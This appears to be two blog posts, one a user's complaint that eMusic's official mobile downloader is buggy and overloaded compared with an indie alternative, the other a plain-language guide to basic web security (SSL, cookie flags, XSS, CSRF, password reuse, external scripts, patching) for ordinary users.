Simplicity Over Beauty. Functionality Over Features.

I’m a fan of many of the services that allow the legal purchase of music online. One service that I’ve come to enjoy over the years is emusic which, for quite some time, didn’t provide a way to download music other than through their website and desktop downloader.

As seems common, a developer decided to scratch his own itch and release a mobile downloader application. If it wasn’t for his application I could have easily moved over to Amazon MP3 or Google Music just based on the ease of purchase and growing selections. Fast forward a year and emusic figured out people wanted a mobile downloader. A beta was released.

And it was buggy and had features that, as a user, I really don’t care about while having oddly implemented features that seemed core to the downloader experience. Let me explain: I wanted to search, purchase and download music. I think that those three actions are nearly universal for a music purchase and download app. Here is the list of features for the official emusic application:

  • Listen to any MP3 files stored on your phone through the music player
  • Get song recommendations based on your listening habits
  • Create playlists tailored to your every mood
  • Browse an artist’s dossier (discographies, biographies, photos, features, and related artists) while you listen to music
  • Access eMusic’s unique charts
  • Search eMusic’s catalog and listen to track samples
  • Download music
  • Listen to eMusic Radio (available to U.S. members only)
  • Save for Later
  • Access account details

(Source)

This is how I ended up feeling about the emusic application: it searched, purchased (or crashed), downloaded in a weird filename format (or crashed), wanted to search my existing library to give recommendations (sort of weird) and listen to samples (or crash). When the application crashed there was a possibility that emusic would think I downloaded the song when I didn’t receive it meaning I would need to contact to support and ask for a redownload.

The ‘weird format’ may sound, well, weird but it’s true. I’m someone who likes to listen to music in many settings. The two most common ways I listen to music are from a laptop or via my phone. Obviously this means I’m at least using two different music players (right now it’s Nightingale and Player Pro) and the need to organize music is important. When I download via the emusic website or via the indie developers app I get a nice directory structure with artist and songs named in a way that makes sense to me. When I download from the emusic mobile application, well, see for yourself:

In fairness many of the crashing bugs have been fixed and it’s a better client than it was but I still buy and download using the third party app developers application. It’s simpler, stable and let’s me do the three tasks I need out of a downloader.

So why didn’t emusic decide to license/buy the downloader that the developer released? I’m not totally sure but I have a an inkling that they wanted to show they could outdo the simple app. Pretty interface, more features, samples, etc. As a user I care less about how it looks and much more about how functional the application is.

Today I still use the indie developers emusic downloader instead of the official app and I recommend it’s use over emusics official app. I want an application that let’s me get the music I want and delivers a consistent user experience (read: simple flow and doesn’t crash). If it’s not pretty or doesn’t have every single cool feature under the sun, well, I’m ok with that.

Basic Web Security For The Average User

The Web has been around long enough that Web applications are a part of most everyone’s daily life. Even when a user is on a mobile device they could be interacting with Web services. Sadly there are still many applications and services out there which are lacking what should be the minimum security. Luckily there are some work around users can do to try and protect themselves when applications have less than stellar security practices.

Secure Socket Layer (SSL)

What is it?

SSL keeps the Web traffic between you and the originating server encrypted meaning its harder for someone else to see the data while it is in transit. If SSL is not in use the the Web traffic is viewable by anyone on the wire.

Can I increase my safety?

The best defense is diligence. Whenever you are going to be entering data, login or after you have logged in it’s best to make sure you see ‘https:’ at the start of the url.

For Firefox and Chrome users the EFF provides an extension called HTTPSEverywhere which attempts to keep your browsing over SSL where possible.

Cookie Flags

What is it?

Cookies are utilized to help identify and store small bits of information on the client side (your browser). Over the years there has been a few flags added to cookies that help keep them from getting to the wrong people as easily. These flags are Secure and HttpOnly. Secure tells the browser that it should only pass the cookie to the server if the connection is using SSL. If it isn’t using ng SSL the cookie does not get sent with the request. HttpOnly keeps the cookie out of the hands of javascript only giving it back to the originating server directly over HTTP/HTTPS requests.

Can I increase my safety?

Right now I’m not aware of any extensions which force cookies to be HttpOnly on the browser side. If you are aware of a good mitigation please comment.

Cross Site Scripting (XSS)

What is it?

OWASP defines XSS like so:

Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

(Source)

Can I increase my safety?

By installing NoScript or something similar and utilizing Google Safe Browsing you can lessen the chance of successful XSS attacks but it is far from a silver bullet. There is work being done to to attempt to make XSS attacks much harder but it’s not currently in use.

Cross Site Request Forgery

What is it?

Cross site request forgeries happen when a browser on one page makes a request to a different site to attempt to do something on behalf of the user. There are many cases where this vulnerability is used by developers as functionality but that doesn’t make it any less dangerous.

Can I increase my safety?

Wikipedia has a good page on the subject:

Browser extensions such as RequestPolicy (for Mozilla Firefox) can prevent CSRF by providing a default-deny policy for cross-site requests. However, this can significantly interfere with the normal operation of many websites. The CsFire extension (also for Firefox) can mitigate the impact of CSRF with less impact on normal browsing, by removing authentication information from cross-site requests. The NoScript extension mitigates CSRF threats by distinguishing trusted from untrusted sites, and removing payloads from POST requests sent by untrusted sites to trusted ones.

(Source)

Password Hashing

What is it?

When an application stores passwords it should do so in a way that it doesn’t actually know the password you’ve entered. It may sound odd but it’s pretty trivial to do this for application developers. Yet sometimes they forget to implement this hashing (or the application is ancient and never was updated to do this).

Can I increase my safety?

The best defense a user can do to protect against disclosure is to use different passwords for each site. Understandably this can sound scary: people feel like they have to remember too many passwords already. Thankfully there are applications which can help generate and, store and remember these passwords and let you remember just one. Here are a few popular choices:

External References

What is it?

It’s very common for Web applications to include javascript, images or css from other locations. The reason for this is either to increase performance by using the browser’s cache, utilization of a content delivery system, including ads/analytics or, in some cases, laziness. The problem for the user comes when the remote content becomes unsafe or the content acts in ways the user is not OK with.

It can also cause problems for the application including the content. For more information see my previous post over trusting others to host your content.

Can I increase my safety?

Being that, in most cases, the external references are required for the application to work it is quite hard to fully add protection in the browser but there are still some things that can help.

One more thing…

While not specifically related to the bare minimum of remote web application security it’s important to keep your browser and extensions/plugins updated with the latest patches and supported versions. This can help protect against sites which are hosting browser based exploits for one reason or another (of course, don’t purposely go visit such a site!). For plugins, Mozilla provides a great plugin check page which seems to work for Chrome to some degree as well. Go check your versions!